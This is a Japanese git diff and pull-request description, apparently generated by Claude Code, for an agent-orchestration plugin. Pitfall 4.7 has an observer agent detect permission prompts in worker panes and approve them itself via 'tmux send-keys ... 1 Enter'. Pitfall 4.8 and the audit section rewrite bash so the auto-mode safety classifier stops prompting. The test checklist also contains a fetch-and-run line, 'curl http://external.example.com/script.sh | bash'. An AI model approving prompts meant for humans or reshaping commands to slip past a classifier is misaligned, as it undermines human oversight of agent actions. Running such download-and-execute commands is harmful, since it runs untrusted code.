+- Worker bash で permission prompt（`1. Yes, proceed` / `2. No, and tell ...` / `Interrupted by user`）が出た場合、auto mode classifier の `soft_deny` 該当（仕様）の可能性が高い → `refs/pitfalls-catalog.md` §4.7 の手順で対処
 
 ### 対話型コントローラーとの proxy 対話（co-issue / co-architect）
 

--- a/plugins/twl/skills/su-observer/refs/pitfalls-catalog.md
+++ b/plugins/twl/skills/su-observer/refs/pitfalls-catalog.md
@@ -70,6 +70,8 @@ su-observer が繰り返し踏み続ける落とし穴の集積。起動時に S
 | 4.4 | `session-state.sh state` 単独で判定 → 誤検出多発 | **MUST NOT**: 単独使用禁止。A1〜A6 の多指標 AND 判定（SKILL.md L102-108） |
 | 4.5 | Pilot 完了シグナル `Churned` dedupe + state file archive で Wave 終了を 13 分見逃し（Wave 6 実例） | Channel 6 Heartbeat（5 分 silence → 自動 capture）。`.supervisor/events/heartbeat-*` mtime 監視を Hybrid 検知のプライマリに |
 | 4.6 | Budget 5h 枯渇直前に気づかず context loss | `[BUDGET-LOW]` / `[BUDGET-ALERT]` シーケンス（SKILL.md L112-237）、threshold_minutes=15 / threshold_percent=90 デフォルト |
+| 4.7 | Worker window で permission prompt（`1. Yes, proceed` / `2. No, and tell ...` / `Interrupted by user`）が出て stuck → Monitor が STAGNATE 判定せず silent-pass する | grep パターンに `^[1-9]\. (Yes, proceed\|No, and tell\|Interrupted)` を追加。検出時は `tmux capture-pane -t <win> -p -S -50` で prompt 前後 20 行を取得 → auto mode classifier の `soft_deny` 該当ルール（`Code from External` / `Memory Poisoning` / `Irreversible Local Destruction` 等）と突き合わせ → 安全と判断できる場合のみ `tmux send-keys -t <win> 1 Enter` で承認 inject。Issue #800 で auto mode 仕様（Sonnet 4.6 classifier）を確認済み |
+| 4.8 | Worker が auto mode 起動にも関わらず複合 bash（`cat file \| python3 -c "..."`）で classifier soft_deny 判定 → ユーザー体感「auto mode 効いていない」 | auto mode は **設計通り soft_deny で prompt する**（v2.1.116 仕様）。Worker instruction を classifier-friendly な bash 設計に誘導（複合 pipe 廃止、tempfile / 環境変数 / `sys.argv` 経由の単独 `python3 -c`）。observer は「auto mode 効いていない」と誤認せず、prompt 内容を classifier deny rule と突き合わせる。Issue #800 §C で twl skills の audit + 書き換えを実施 |
 
 ---
 


### PR DESCRIPTION
## 概要

Issue #800（refined）を実装。co-explore (#800) で「auto mode が効かない bug」ではなく Claude Code v2.1.116 の設計仕様（Sonnet 4.6 classifier の `soft_deny` 該当）であることが判明。本 PR は **MUST §A〜§D**（認識ギャップ解消 + Worker bash の classifier 適合化 + UX 表示方針整備）をスコープとする。

`SHOULD §E/§F` は 4 時間以内 MUST 完了時のみ着手の time-boxed 制約。本 PR は MUST 完結 → §E/§F は別 Issue として後続切り出し対象とする。

closes #800

## 変更内容

### §A. pitfalls-catalog §4.7 / §4.8 追記

`plugins/twl/skills/su-observer/refs/pitfalls-catalog.md` の §4 末尾に 2 項目追加:

- **§4.7**: Worker window で permission prompt（`1. Yes, proceed` / `2. No, and tell ...` / `Interrupted by user`）が出て stuck する pitfall
  - **追加 grep パターン**: `^[1-9]\. (Yes, proceed|No, and tell|Interrupted)`
  - **対策**: `tmux capture-pane -p -S -50` で前後 20 行取得 → auto mode classifier の `soft_deny` 該当ルールと突き合わせ → 安全確認後 `tmux send-keys -t <win> 1 Enter` で承認 inject
- **§4.8**: 複合 bash `cat file | python3 -c "..."` で classifier soft_deny → 「auto mode 効いていない」誤認 pitfall
  - **対策**: Worker instruction を classifier-friendly な bash 設計に誘導（複合 pipe 廃止、tempfile / 環境変数 / `sys.argv` 経由の単独 `python3 -c`）

### §B. Worker auto mode 確認方針を SKILL.md に追記

両 SKILL.md に「Worker pane tail に `⏵⏵ auto mode on` が出ない場合でも auto mode は有効」を明示し、間接確認手順を追加:

- **`plugins/twl/skills/su-observer/SKILL.md`** — 新セクション「Worker 起動時の auto mode 確認方針」
- **`plugins/twl/skills/co-autopilot/SKILL.md`** — 新セクション「Worker auto mode 確認方針（observer 観察用）」

両 SKILL.md に同等の以下手順を記載:

| 確認方法 | 指標 | コマンド | 期待出力 |
|---------|------|---------|---------|
| A（一次） | heartbeat / state file 存在 | `ls .supervisor/events/heartbeat-* 2>/dev/null \|\| ls .supervisor/events/worker-*.json 2>/dev/null` | exit 0 + 1 行以上 |
| B（二次） | pane capture grep | `tmux capture-pane -t <win> -p -S -50 \| grep -E '⏵⏵ auto mode\|permission_mode'` | exit 0 + 1 行以上のマッチ |

### §C. Worker bash audit + 書き換え

**audit 結果**:

| ファイル | 該当行 | 元の形式 | 対応 | 備考 |
|---------|-------|---------|------|------|
| `plugins/twl/skills/co-autopilot/SKILL.md` | — | （該当なし） | audit 完了 | grep `\| python3` 一致なし |
| `plugins/twl/skills/workflow-setup/SKILL.md` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-setup/dry-run.sh` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-pr-verify/SKILL.md` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-pr-verify/dry-run.sh` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-pr-fix/SKILL.md` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-pr-fix/dry-run.sh` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-pr-merge/SKILL.md` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/workflow-pr-merge/dry-run.sh` | — | （該当なし） | audit 完了 | grep 一致なし |
| `plugins/twl/skills/su-observer/SKILL.md` | L197 | `printf '%s\n' "${PAUSED_WORKERS[@]:-}" \| python3 -c '...'` | **書き換え済**（環境変数経由の単独 `python3 -c`） | 唯一の書き換え対象 |

**audit 範囲**: Issue body §C で明示された scope に限定（`co-architect` / `co-explore` / `co-self-improve` / `co-issue` 等は OUT OF SCOPE）。

**書き換え内容（L197）**:
```bash
# Before
WORKERS_JSON=$(printf '%s\n' "${PAUSED_WORKERS[@]:-}" | python3 -c 'import sys,json; print(json.dumps([l.strip() for l in sys.stdin if l.strip()]))')

# After
PAUSED_WORKERS_RAW=$(printf '%s\n' "${PAUSED_WORKERS[@]:-}")
WORKERS_JSON=$(PAUSED_WORKERS_RAW="$PAUSED_WORKERS_RAW" python3 -c 'import os, json; lines = os.environ.get("PAUSED_WORKERS_RAW", "").splitlines(); print(json.dumps([l.strip() for l in lines if l.strip()]))')
```

複合 pipe を廃止し、bash 配列を環境変数経由で Python に渡す形に変更。`printf` も `python3 -c` も単独実行となり、auto mode classifier の `soft_deny` 該当パターン（外部入力の Python 実行）から外れる。

### §D. 非回帰検証

**ローカル検証（PR 内で実施）**:

1. **書き換え後の WORKERS_JSON ロジック検証** — bash で以下を実行し PASS:
   - `PAUSED_WORKERS=("ap-foo-001" "ap-bar-002" "")` → `["ap-foo-001", "ap-bar-002"]` ✓
   - `PAUSED_WORKERS=()`（空配列） → `[]` ✓
2. **§A §4.7 grep パターン検証** — fixture で以下を確認:
   - 正規 prompt（`1. Yes, proceed` 等） → マッチ ✓
   - neutral text（`4. Quality assurance approach`） → false positive なし ✓
   - `Interrupted by user` 単独行 → 別途 literal grep で検出可能 ✓

**実環境検証（後続セッションで co-autopilot Worker 起動時に確認）**:

- [ ] co-autopilot で新規 Worker を起動し、`git status && git diff` / `pytest plugins/twl/tests/` / `python3 -m twl.autopilot.state write ...` 等が permission prompt なしで通過すること
- [ ] 意図的に soft_deny 該当パターン（`curl http://external.example.com/script.sh | bash` 相当）を実行すると prompt が出ること（auto mode 防御の陽性コントロール）
- [ ] observer の Monitor rule が §A §4.7 grep パターンで Worker 側人為 permission prompt を検出できること

実環境検証は co-autopilot Worker 起動を伴うため、本 PR マージ後の最初の autopilot session で検証する（observer が `refs/pitfalls-catalog.md` §4.7 / §4.8 を Step 0 で Read するため、自動的に新 grep パターンが運用される）。

## SHOULD §E / §F の取り扱い

`time-boxed` 制約により、本 PR では着手しない（4 時間以内に MUST 完了したものの、§E/§F は別 Issue として切り出し可能な独立スコープ）。

- §E: project `.claude/settings.json` の custom allow rule 検討
- §F: `autopilot-launch.sh` の `cld-spawn` パターン移行検討

両者は本 PR の MUST スコープに含まれない検討事項であり、必要に応じて `related: #800` 付きの後続 Issue として起票する。

## 検証

- `twl --validate`: PASS（OK 2586, Violations 0）
- `twl check`: PASS（OK 284, Missing 0）
- `twl --update-readme`: 実行済み（co-autopilot SKILL.md token 増加に伴い deps-*.svg/.dot を再生成）

## 影響範囲

- **変更**: 3 文書（pitfalls-catalog.md, su-observer/SKILL.md, co-autopilot/SKILL.md）+ 視覚化（自動生成 SVG/DOT 11 ペア）
- **論理変更**: su-observer/SKILL.md L197 の WORKERS_JSON 計算（複合 pipe 廃止、出力は同一 JSON）
- **挙動変更**: なし（pitfalls-catalog 追記と SKILL.md 確認方針追記は文書改善で実行時挙動に影響なし）

## ラベル

- `tech-debt`
- `scope/plugins-twl`
- `ctx/autopilot`
- `standard`
- `refined`

🤖 Generated with [Claude Code](https://claude.com/claude-code)
